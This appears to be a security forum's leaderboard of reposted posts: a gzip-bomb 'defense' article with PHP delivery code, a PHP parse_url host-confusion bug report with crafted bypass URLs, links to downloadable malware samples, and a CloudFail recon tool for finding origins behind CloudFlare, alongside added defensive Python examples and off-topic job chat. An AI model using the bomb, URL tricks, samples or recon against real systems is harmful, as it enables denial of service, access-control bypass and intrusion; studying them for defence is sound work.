Leaderboard
Popular Content
Showing content with the highest reputation on 07/06/17 in all areas
-
How to defend your website with ZIP bombs
The good old methods still work today
Posted by Christian Haschek on 2017-07-05

[update] I'm on some list now that I have written an article about some kind of "bomb", ain't I?

If you have ever hosted a website or even administrated a server you'll be very well aware of bad people trying bad things with your stuff. When I first hosted my own little Linux box with SSH access at age 13 I read through the logs daily and reported the IPs (mostly from China and Russia) who tried to connect to my sweet little box (which was actually an old ThinkPad T21 with a broken display running under my bed) to their ISPs.

Actually if you have a Linux server with SSH exposed you can see how many connection attempts are made every day:

```
grep 'authentication failures' /var/log/auth.log
```

Hundreds of failed login attempts even though this server has disabled password authentication and runs on a non-standard port

Wordpress has doomed us all

Ok, to be honest, web vulnerability scanners have existed before Wordpress, but since WP is so widely deployed most web vuln scanners include scans for some misconfigured wp-admin folders or unpatched plugins. So if a small, new hacking group wants to gain some hot cred they'll download one of these scanner things and start testing against many websites in hopes of gaining access to a site and defacing it.

Sample of a log file during a scan using the tool Nikto

This is why all server or website admins have to deal with gigabytes of logs full of scanning attempts. So I was wondering... Is there a way to strike back?

After going through some potential implementations with IDS or Fail2ban I remembered the old ZIP bombs from the old days.

WTH is a ZIP bomb?

So it turns out ZIP compression is really good with repetitive data, so if you have a really huge text file which consists of repetitive data like all zeroes, it will compress it really good. Like REALLY good.

As 42.zip shows us it can compress a 4.5 petabyte (4.500.000 gigabytes) file down to 42 kilobytes. When you try to actually look at the content (extract or decompress it) then you'll most likely run out of disk space or RAM.

How can I ZIP bomb a vuln scanner?

Sadly, web browsers don't understand ZIP, but they do understand GZIP. So firstly we'll have to create the 10 gigabyte GZIP file filled with zeroes. We could make multiple compressions but let's keep it simple for now.

```
dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip
```

Creating the bomb and checking its size

As you can see it's 10 MB large. We could do better but good enough for now. Now that we have created this thing, let's set up a PHP script that will deliver it to a client.

```php
<?php
// Prepare the client to receive GZIP data. This will not be suspicious
// since most web servers use GZIP by default.
header("Content-Encoding: gzip");
// Content-Length is the size of the compressed file, not of the expanded data.
header("Content-Length: ".filesize('10G.gzip'));

// Turn off output buffering.
if (ob_get_level()) ob_end_clean();

// Send the gzipped file to the client.
readfile('10G.gzip');
```

That's it! So we could use this as a simple defense like this:

```php
<?php
$agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
// The original script used $url without defining it; derive it from the
// request path, with the leading slash stripped so the startsWith() checks match.
$url = ltrim($_SERVER['REQUEST_URI'] ?? '', '/');

// Check for nikto, sqlmap or "bad" subfolders which only exist on Wordpress.
if (strpos($agent, 'nikto') !== false
    || strpos($agent, 'sqlmap') !== false
    || startsWith($url, 'wp-')
    || startsWith($url, 'wordpress')
    || startsWith($url, 'wp/')) {
    sendBomb();
    exit();
}

function sendBomb() {
    // Prepare the client to receive GZIP data. This will not be suspicious
    // since most web servers use GZIP by default.
    header("Content-Encoding: gzip");
    header("Content-Length: ".filesize('10G.gzip'));

    // Turn off output buffering.
    if (ob_get_level()) ob_end_clean();

    // Send the gzipped file to the client.
    readfile('10G.gzip');
}

function startsWith($haystack, $needle) {
    return (substr($haystack, 0, strlen($needle)) === $needle);
}
```

This script obviously is not - as we say in Austria - the yellow of the egg, but it can defend from the script kiddies I mentioned earlier who have no idea that all these tools have parameters to change the user agent.

Sooo. What happens when the script is called?

| Client | Result |
|---|---|
| IE 11 | Memory rises, IE crashes |
| Chrome | Memory rises, error shown |
| Edge | Memory rises, then drips and loads forever |
| Nikto | Seems to scan fine but no output is reported |
| SQLmap | High memory usage until crash |

(if you have tested it with other devices/browsers/scripts, please let me know and I'll add it here)

Reaction of the script called in Chrome

If you're a risk taker: Try it yourself

Source: https://blog.haschek.at/post/f2fda6
points
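An added illustration, not part of the reposted article and not the blog author's code: the Python script below does in memory what the `dd | gzip` command in the post does on disk, and then shows the check a scanner, crawler or HTTP client needs so that a gzip bomb like this one cannot exhaust its memory, namely decompression with a hard cap on output size using `zlib.decompressobj` and its `max_length` argument. The 32 MiB bomb size and the 8 MiB cap are assumptions chosen for the demo.

```python
import gzip
import io
import zlib

# Assumed demo sizes: 32 MiB of zeros for the "bomb", an 8 MiB cap for the reader.
BOMB_SIZE = 32 * 1024 * 1024
OUTPUT_CAP = 8 * 1024 * 1024


def make_gzip_bomb(size_bytes: int) -> bytes:
    """In-memory equivalent of `dd if=/dev/zero ... | gzip`: size_bytes of zeros,
    gzip-compressed. Deflate compresses zeros at roughly 1000:1."""
    buf = io.BytesIO()
    block = b"\x00" * (1024 * 1024)
    with gzip.GzipFile(fileobj=buf, mode="wb") as gz:
        remaining = size_bytes
        while remaining > 0:
            n = min(len(block), remaining)
            gz.write(block[:n])
            remaining -= n
    return buf.getvalue()


def bounded_gunzip(data: bytes, limit: int) -> bytes:
    """Decompress a gzip stream but refuse to produce more than `limit` bytes.

    decompress(max_length=...) stops once the output buffer is full and parks the
    unprocessed input in .unconsumed_tail, so no more than limit+1 bytes of
    output are ever materialised, no matter how large the stream expands to."""
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16 + MAX_WBITS selects gzip framing
    out = bytearray()
    pending = data
    while pending:
        # Ask for at most one byte beyond the cap; receiving it proves a bomb.
        out += d.decompress(pending, max_length=limit + 1 - len(out))
        if len(out) > limit:
            raise ValueError(f"decompression bomb: output exceeds {limit} bytes")
        pending = d.unconsumed_tail
    # flush() may release a few KiB still held in zlib's bit buffer; check it too.
    out += d.flush()
    if len(out) > limit:
        raise ValueError(f"decompression bomb: output exceeds {limit} bytes")
    return bytes(out)


def is_bomb(data: bytes, limit: int) -> bool:
    """True if the stream would exceed `limit` bytes when expanded."""
    try:
        bounded_gunzip(data, limit)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    bomb = make_gzip_bomb(BOMB_SIZE)
    print(f"{BOMB_SIZE} bytes of zeros -> {len(bomb)} bytes of gzip "
          f"(ratio {BOMB_SIZE / len(bomb):.0f}:1)")
    print("bounded reader rejects it:", is_bomb(bomb, OUTPUT_CAP))
    # An unbounded reader happily expands the whole thing; this is what the
    # browsers and scanners in the table above do until they run out of memory.
    print("unbounded gzip.decompress expands to:", len(gzip.decompress(bomb)), "bytes")
```

The cap is enforced on the decompressor's output, not on `Content-Length`, because the header only states the compressed size; a client that trusts it allocates for 10 MB and receives 10 GB.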
-
2 points
-
Description:
------------
URLs like these

- http://example.com:80#@google.com/
- http://example.com:80?@google.com/

make parse_url return the wrong host.

https://tools.ietf.org/html/rfc3986#section-3.2
The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI.

This problem has been fixed in 7.1. https://github.com/php/php-src/pull/1607
But this issue should be recognized as a security issue.

Example:
- bypass authentication protocol (verify hostname of callback URL by parse_url)
- open redirector (verify hostname by parse_url)
- server-side request forgery (verify hostname by parse_url and get_content)

Test script:
---------------
```
php > echo parse_url("http://example.com:80#@google.com/")["host"];
google.com
php > echo parse_url("http://example.com:80?@google.com/")["host"];
google.com
php > echo file_get_contents("http://example.com:80#@google.com");
... contents of example.com ...
```

Expected result:
----------------
parse_url("http://example.com:80#@google.com/")["host"]; example.com or parse error.

Source: https://cxsecurity.com/issue/WLB-20170700541
1 point
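An added example, not part of the bug report and not PHP's code: a Python implementation of the RFC 3986 section 3.2 rule quoted in the report (the authority ends at the first "/", "?" or "#") next to a deliberately naive parser that reproduces the faulty behaviour the report describes (it looks for "@" before stopping at "?" or "#"). A hostname allowlist check then shows how a callback or redirect validator behaves with each parser on the report's two URLs. The naive parser is a constructed illustration, not the actual parse_url implementation, and the allowlist is an assumption.

```python
import re
from urllib.parse import urlsplit

# RFC 3986 section 3.2: the authority starts after "//" and ends at the first
# "/", "?" or "#", or at the end of the URI.
_AUTHORITY = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://(?P<authority>[^/?#]*)")


def rfc3986_host(url: str):
    """Host component extracted by the RFC rule; None if there is no authority."""
    m = _AUTHORITY.match(url)
    if not m:
        return None
    authority = m.group("authority")
    # userinfo (if any) ends at the last "@" of the authority, never beyond it
    hostport = authority.rsplit("@", 1)[-1]
    if hostport.startswith("["):                      # IPv6 literal: [addr]:port
        end = hostport.find("]")
        return hostport[: end + 1].lower() if end != -1 else None
    host = hostport.split(":", 1)[0].lower()
    return host or None


def naive_host(url: str):
    """Constructed illustration of the faulty behaviour in the report: the parser
    scans for "@" up to the next "/" only, so "?" and "#" do not end the
    authority. This is NOT the real parse_url code."""
    start = url.find("//")
    if start == -1:
        return None
    authority = url[start + 2:].split("/", 1)[0]      # stops only at "/"
    hostport = authority.rsplit("@", 1)[-1]
    return hostport.split(":", 1)[0].lower() or None


def callback_allowed(url: str, allowed_hosts, parser=rfc3986_host) -> bool:
    """The validator pattern the report warns about: accept the callback or
    redirect only if the parsed host is on the allowlist."""
    return parser(url) in allowed_hosts


ALLOWED = {"google.com"}      # assumed allowlist an application might trust
REPORT_URLS = [               # the two URLs from the bug report
    "http://example.com:80#@google.com/",
    "http://example.com:80?@google.com/",
]

if __name__ == "__main__":
    for u in REPORT_URLS:
        print(u)
        print(f"  rfc3986_host -> {rfc3986_host(u)!r}  "
              f"urlsplit -> {urlsplit(u).hostname!r}  naive_host -> {naive_host(u)!r}")
        print(f"  allowed by naive parser: {callback_allowed(u, ALLOWED, naive_host)}, "
              f"by RFC parser: {callback_allowed(u, ALLOWED)}")
```

With the naive parser both report URLs pass the allowlist as "google.com" while any fetch of them actually goes to example.com, which is the authentication-bypass, open-redirect and SSRF angle the report lists; the RFC parser (and Python's `urlsplit`) returns example.com for both, so the check fails as it should.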
-
Yes, but saying that you're better off taking 17,000 noobs rather than 1,000 experienced people is a bit of a stretch. I have juniors on my team and I've seen the difference between a senior and a junior. An example I've already written here: a simple newsletter that took a junior 5 days and a senior 6 hours (the senior used a few open source tools). Just saying, there are advantages and disadvantages...
1 point
-
samples - zip pass: virus:
https://yadi.sk/d/QT0l_AYg3KXCqc
https://yadi.sk/d/S0-ZhPY53KWc84
https://yadi.sk/d/Zpkm88sp3KWc8v
https://yadi.sk/d/WemMDKVy3KXPcy
svchost.exe: https://yadi.sk/d/TsNv7OGW3KXvmS
027cc450ef5f8c5f653329641ec1fed9.exe in pseudocode: https://transfer.sh/m9JMB/027cc450ef5f8c5f653329641ec1fed9.txt
RTF payload: https://transfer.sh/mCshn/data.txt
SOURCE: https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759
1 point
-
1 point
-
Take a quick trip to Iasi: http://www.umfiasi.ro/ScoalaDoctorala/TezeDoctorat/Teze Doctorat/Rezumat teza doctorat Alexandru Nemtoi.pdf
Doctoral theses are usually also deposited at the library.
http://dental.pacific.edu/Documents/profresources/Medically_Complex.pdf - here you have the rest.
http://eprints.ugd.edu.mk/9426/1/1. teza de doctorat - Kiro Papakoca.pdf - somewhat off topic.
Type "inurl:pdf" into Google. Good luck.
1 point
-
That's about how he tried with my post too, without reaching a conclusion. @Robert1995 the important words are "demand", "supply" and "labour market". Most of the topic is about companies that want experienced employees and keep complaining that they can't find any. That's the demand. The supply is full of young people without experience who are eager to work, not like some bored dinosaurs who wait for the workday to end. We're speaking in general terms, because there are certainly exceptions to these patterns. A young person will be much easier to integrate and mould into a company/organisational structure/working regime. Of course they couldn't care less about the advantages of a noob, but when they have a herd of dinosaurs flexing at each other to see who's the bigger hotshot, they can say goodbye to teamwork and cooperation. And that's how you end up with people who can't integrate and do more harm with their attitude than all the lines of code they write. These things about relations between employees fall under the jurisdiction of the HR department, which is full of fussy bitches with attitude who have no idea what's going on in the company. When it comes to money, whether you're a dinosaur or a noob, a company will always try to bury you in work up to your neck or pay you a small salary, unless you're an ass-kisser who profits from other people's work (the third category, and the most dangerous one). In conclusion, every category has advantages and disadvantages.

P.S. There are other characteristics of the groups listed, I just don't feel like expanding my HR knowledge for a lousy topic about salaries.

P.P.S. Some dinosaurs also form packs in their fierce struggle for supremacy. Oh, how much fun I'd have in an HR department. Play time with real people and feelings.
1 point
-
https://www.sendspace.com/file/3v4ois
Xylitol dynamic analysis: https://www.youtube.com/watch?v=VI9avdsmIwY
1 point
-
1 point
-
CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases.

1. Misconfigured DNS scan using DNSDumpster.com.
2. Scan the Crimeflare.com database.
3. Bruteforce scan over 2500 subdomains.

Please feel free to contribute to this project. If you have an idea or improvement issue a pull request!

Disclaimer

This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.

Usage

To run a scan against a target:

```
python cloudfail.py --target seo.com
```

To run a scan against a target using Tor:

```
service tor start
python cloudfail.py --target seo.com --tor
```

(or if you are using Windows or Mac install vidalia or just run the Tor browser)

Dependencies

Python3, argparse, colorama, socket, binascii, datetime, requests

Download: https://github.com/m0rtem/CloudFail
1 point
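The disclaimer above notes that the tool finds nothing when the CDN is set up so that the origin address never appears in DNS. As an added example from the defender's side (not CloudFail's own code), this Python script audits a zone's A/AAAA records against the address ranges the proxy provider publishes and lists every record that points past the proxy; forgotten hosts such as `dev.` are exactly what the subdomain phase of the tool relies on. The zone records and the proxy ranges below are constructed placeholders in documentation address space, not Cloudflare's real ranges; replace them with your zone export and your provider's published list.

```python
import ipaddress
from collections import defaultdict

# Constructed placeholder ranges (RFC 5737 / RFC 3849 documentation space) standing
# in for the proxy/CDN ranges your provider publishes. NOT Cloudflare's real ranges.
PROXY_RANGES = [
    ipaddress.ip_network("198.51.100.0/24"),
    ipaddress.ip_network("2001:db8:1::/48"),
]

# Constructed sample zone export for a hypothetical domain: (name, type, value).
ZONE_RECORDS = [
    ("example.test",      "A",    "198.51.100.10"),   # proxied web front end
    ("www.example.test",  "A",    "198.51.100.10"),   # proxied
    ("example.test",      "AAAA", "2001:db8:1::10"),  # proxied
    ("mail.example.test", "A",    "192.0.2.25"),      # mail host, deliberately direct
    ("dev.example.test",  "A",    "192.0.2.80"),      # forgotten staging name on the origin
    ("ftp.example.test",  "A",    "192.0.2.80"),      # same origin address as dev
    ("example.test",      "MX",   "mail.example.test"),
]


def is_proxied(ip: str, ranges=PROXY_RANGES) -> bool:
    """True if the address lies inside one of the proxy ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ranges)


def find_origin_exposures(records, ranges=PROXY_RANGES, expected_direct=frozenset()):
    """Return (name, ip) for every A/AAAA record outside the proxy ranges, skipping
    names the operator has declared as intentionally direct (e.g. the MX host)."""
    exposures = []
    for name, rtype, value in records:
        if rtype not in ("A", "AAAA") or name in expected_direct:
            continue
        if not is_proxied(value, ranges):
            exposures.append((name, value))
    return exposures


def group_by_address(exposures):
    """Map each exposed address to the names pointing at it. Several names on one
    unproxied address usually means that address is the shared origin server."""
    groups = defaultdict(list)
    for name, ip in exposures:
        groups[ip].append(name)
    return dict(groups)


if __name__ == "__main__":
    found = find_origin_exposures(ZONE_RECORDS, expected_direct={"mail.example.test"})
    for ip, names in group_by_address(found).items():
        print(f"{ip} reachable directly via: {', '.join(names)}")
```

Run this against every zone export after DNS changes; a record that bypasses the proxy is harmless only if the origin firewall also rejects traffic that does not arrive from the proxy ranges, which is the second half of the "setup CloudFlare properly" the disclaimer refers to.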
-
0 points
-
-1 points
This leaderboard is set to Bucharest/GMT+03:00